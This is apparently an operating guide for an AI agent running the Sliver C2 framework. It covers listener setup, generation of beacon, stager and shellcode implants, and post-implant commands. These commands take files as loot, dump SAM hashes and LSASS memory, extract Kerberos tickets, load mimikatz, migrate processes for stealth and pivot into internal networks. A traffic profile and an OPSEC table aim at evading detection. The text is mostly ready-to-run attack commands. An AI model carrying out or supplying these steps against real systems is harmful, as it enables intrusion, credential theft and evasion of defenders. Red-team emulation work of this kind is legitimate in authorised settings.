Sliver C2 framework operations — server connection, listener setup, implant generation, BOF/Armory extensions, post-implant operations, HTTP C2 profiles.
Sliver is an open-source, cross-platform adversary emulation framework by BishopFox. It supports beacon (async) and session (interactive) implants over mTLS, HTTPS, DNS, and WireGuard channels with multi-operator support.
Server:
c2-slivercontainer onsandbox-net(daemon mode, gRPC on port 31337) Client:sliver-clientpre-installed in sandbox Config: Auto-generated operator config at/workspace/.sliver-configs/decepticon.cfgConnection Procedure (via bash tool)
# 1. Verify C2 reachable bash(command="nc -z c2-sliver 31337 && echo 'C2_OK' || echo 'C2_DOWN'") # 2. Import operator config (once — skip if already imported) bash(command="ls ~/.sliver-client/configs/ 2>/dev/null | grep -q . || sliver-client import /workspace/.sliver-configs/decepticon.cfg") # 3. Start interactive console in dedicated tmux session bash(command="sliver-client console", session="c2") # 4. Run Sliver commands interactively bash(command="https --lhost 0.0.0.0 --lport 443 --domain c2-sliver", is_input=True, session="c2") bash(command="sessions", is_input=True, session="c2")
IMPORTANT:
/workspace/.sliver-configs/decepticon.cfgsliver-server in sandbox — the server runs in its own containersliver-client console is interactive — MUST use a dedicated session (e.g. session="c2") and send subsequent commands with is_input=Truebash(command="sliver-client console --config ~/.sliver-client/configs/decepticon_c2-sliver.cfg", session="c2")All commands below run inside the Sliver console (
session="c2",is_input=True).
# Basic HTTPS listener on 443
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver
# HTTPS with custom certificate (better OPSEC)
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver \
--cert /workspace/certs/cert.pem \
--key /workspace/certs/key.pem
# HTTPS with Let's Encrypt (requires DNS control)
https --lhost 0.0.0.0 --lport 443 --domain c2-sliver --lets-encrypt
# DNS listener — requires NS record pointing to C2 server
dns --domains c2.<TARGET> --lport 53
# Verify DNS resolution
dig @c2-sliver test.c2.<TARGET> TXT +short
# mTLS — encrypted, mutual authentication (recommended for internal pivoting)
mtls --lhost 0.0.0.0 --lport 8888
# mTLS on non-standard port
mtls --lhost 0.0.0.0 --lport 8443
# WireGuard tunnel — full network access through implant
wg --lhost 0.0.0.0 --lport 51820
CRITICAL — Compilation Timeout: Sliver's
generatecommand compiles a Go binary from source. This takes 2-10 minutes depending on options. The spinner animation (⠴ Compiling, please wait ...) keeps the screen active, so stall detection will NOT trigger early.Rules:
- ALWAYS use
--skip-symbols— reduces compilation time from ~5 min to ~30 sec- ALWAYS use
--save <path>— saves implant directly to the target directory. Do NOT rely on the default save location and thencp— file copy may fail on bind-mounted volumes (WSL2/NTFS "Invalid argument" error).- Use a longer timeout for generate commands:
bash(command="generate ...", is_input=True, session="c2", timeout=300)Example (correct):
bash(command="generate --os linux --arch amd64 --mtls c2-sliver:8888 --skip-symbols --save /workspace/<slug>/exploit/", is_input=True, session="c2", timeout=300)
# Windows beacon via mTLS with jitter
generate beacon --mtls c2-sliver:8888 --os windows --arch amd64 \
--seconds 30 --jitter 50 --skip-symbols \
--name win_beacon \
--save /workspace/<slug>/exploit/
# Windows beacon via HTTPS
generate beacon --https c2-sliver:443 --os windows --arch amd64 \
--seconds 60 --jitter 30 --skip-symbols \
--save /workspace/<slug>/exploit/
# Linux beacon via DNS (low-and-slow)
generate beacon --dns c2-sliver --os linux --arch amd64 \
--seconds 120 --jitter 70 --skip-symbols \
--name lin_dns \
--save /workspace/<slug>/exploit/
# Windows session — persistent connection, immediate response
generate --mtls c2-sliver:8888 --os windows --arch amd64 \
--skip-symbols --name win_session \
--save /workspace/<slug>/exploit/
# Linux session via HTTPS
generate --https c2-sliver:443 --os linux --arch amd64 \
--skip-symbols --name lin_https \
--save /workspace/<slug>/exploit/
# TCP stager — downloads full implant after initial execution
generate stager --lhost c2-sliver --lport 8443 --protocol tcp \
--os windows --arch amd64 \
--save /workspace/<slug>/exploit/stager.bin
# Raw shellcode for process injection / custom droppers
generate --mtls c2-sliver:8888 --os windows --arch amd64 \
--format shellcode --skip-symbols \
--save /workspace/<slug>/exploit/shellcode.bin
| Format | Flag | Use Case |
|---|---|---|
| EXE | --format exe | Direct execution |
| Shared library | --format shared | DLL sideloading |
| Shellcode | --format shellcode | Injection, custom loaders |
| Service | --format service | Windows service persistence |
# Skip debug symbols (smaller, harder to reverse, MUCH faster compile)
generate --mtls c2-sliver:8888 --os windows --skip-symbols
# Limit implant size
generate --mtls c2-sliver:8888 --os windows --format shellcode --skip-symbols
# List active sessions / beacons
sessions
beacons
# Interact with session
use <SESSION_ID>
# Interact with beacon
use <BEACON_ID>
# Background current session
background
# Kill session
sessions -k <SESSION_ID>
# Rename implant
rename -n <NEW_NAME>
# After `use <SESSION_ID>`
whoami # Current user
getuid # User ID
getgid # Group ID
getprivs # Token privileges
info # Full implant info
# System enumeration
shell systeminfo
shell ipconfig /all
shell net user
shell net localgroup administrators
shell tasklist /v
# Environment
env
pwd
ls
# Download from target
download C:\\Users\\<USER>\\Documents\\sensitive.docx /workspace/<slug>/post-exploit/loot/
# Upload tool to target
upload /workspace/<slug>/exploit/implants/SharpHound.exe C:\\Windows\\Temp\\
# List directory
ls C:\\Users\\<USER>\\Desktop\\
# List processes
ps
# Process injection (migrate to another process for stealth)
migrate <PID>
# Execute .NET assembly in memory (no disk touch)
execute-assembly /workspace/tools/Seatbelt.exe -group=all
# Sideload DLL (reflective loading)
sideload /workspace/tools/mimikatz.dll
# Screenshot
screenshot
# Spawn new process
shell notepad.exe
# Dump SAM hashes (requires SYSTEM/admin)
hashdump
# Kerberos ticket extraction
execute-assembly /workspace/tools/Rubeus.exe dump
# DPAPI credential access
execute-assembly /workspace/tools/SharpDPAPI.exe triage
# Comprehensive host audit
execute-assembly /workspace/tools/Seatbelt.exe -group=all
Beacon Object Files (BOFs) execute position-independent C code in the implant process — no new process creation, no disk writes.
# List available extensions
armory
# Install extension from armory
armory install sa-ldapsearch
armory install nanodump
armory install credman
armory install situational-awareness
# Update all installed extensions
armory update
# LDAP enumeration (no LDAP tool needed on target)
sa-ldapsearch -- "(objectClass=user)"
sa-ldapsearch -- "(objectClass=computer)"
# Process dump with nanodump (LSASS without Mimikatz)
nanodump -w C:\\Windows\\Temp\\debug.dmp
# Credential manager access
credman
# Situational awareness (whoami, env, network)
situational-awareness
| Feature | BOF | execute-assembly |
|---|---|---|
| Process creation | None (runs in implant) | Fork & run (new process) |
| Disk artifacts | None | .NET assembly loaded |
| EDR visibility | Low (in-process) | Medium (CLR load event) |
| Size | Small (KBs) | Larger (full .NET binary) |
| Flexibility | C only | Any .NET assembly |
# Route traffic through implant into target network
socks5 start -p 1080
# Use from sandbox with proxychains:
# proxychains nmap -sT -Pn <INTERNAL_HOST>
# Forward local port to remote service through implant
portfwd add -b 127.0.0.1:9090 -r <INTERNAL_HOST>:445
# List active port forwards
portfwd
# Remove forward
portfwd rm -i <ID>
# Expose sandbox service to target network via implant
rportfwd add -b <INTERNAL_HOST>:8080 -r 127.0.0.1:8080
# Create pivot listener on compromised host — new implants connect through it
pivots tcp --bind 0.0.0.0:9898
# Generate implant that connects via pivot
generate --tcp-pivot <PIVOT_HOST>:9898 --os windows
# WireGuard port forward for full tunnel
wg-portfwd add --remote <INTERNAL_HOST>:3389 --bind 127.0.0.1:3389
Custom profiles shape C2 traffic to mimic legitimate application traffic.
{
"implant_config": {
"user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"url_parameters": [
{ "name": "session", "value": "{{.GUID}}", "probability": 100 }
],
"headers": [
{ "name": "Accept", "value": "text/html,application/xhtml+xml", "probability": 100 },
{ "name": "Accept-Language", "value": "en-US,en;q=0.9", "probability": 100 }
]
},
"server_config": {
"headers": [
{ "name": "Content-Type", "value": "text/html; charset=utf-8", "probability": 100 },
{ "name": "Server", "value": "Microsoft-IIS/10.0", "probability": 100 },
{ "name": "X-Powered-By", "value": "ASP.NET", "probability": 100 }
]
}
}
Save to profiles/sliver_https.json and apply when starting HTTPS listener.
| Indicator | Pattern | Mitigation |
|---|---|---|
| Default HTTP headers | Server: Apache/2.4.x + unique header combo | Use custom HTTP C2 profile |
| Default URI patterns | /login.php, /admin/login, /index.php | Custom URI paths |
| mTLS on non-standard ports | Outbound to unusual port (8888) | Use 443/8443 |
| DNS TXT encoding | Base64 TXT > 255 bytes | Fragment, short polling |
| Implant file hashes | Known Sliver samples in VirusTotal | --skip-symbols, custom loaders |
| JA3/JA3S fingerprints | TLS patterns unique to Sliver | Process injection into browser |
sliver-client connects to c2-sliver server successfullywhoami, ps, ls)references/sliver-quickstart.md — Compact command reference for Sliver architecture, listeners, implant generation, post-implant ops, pivoting, and OPSEC.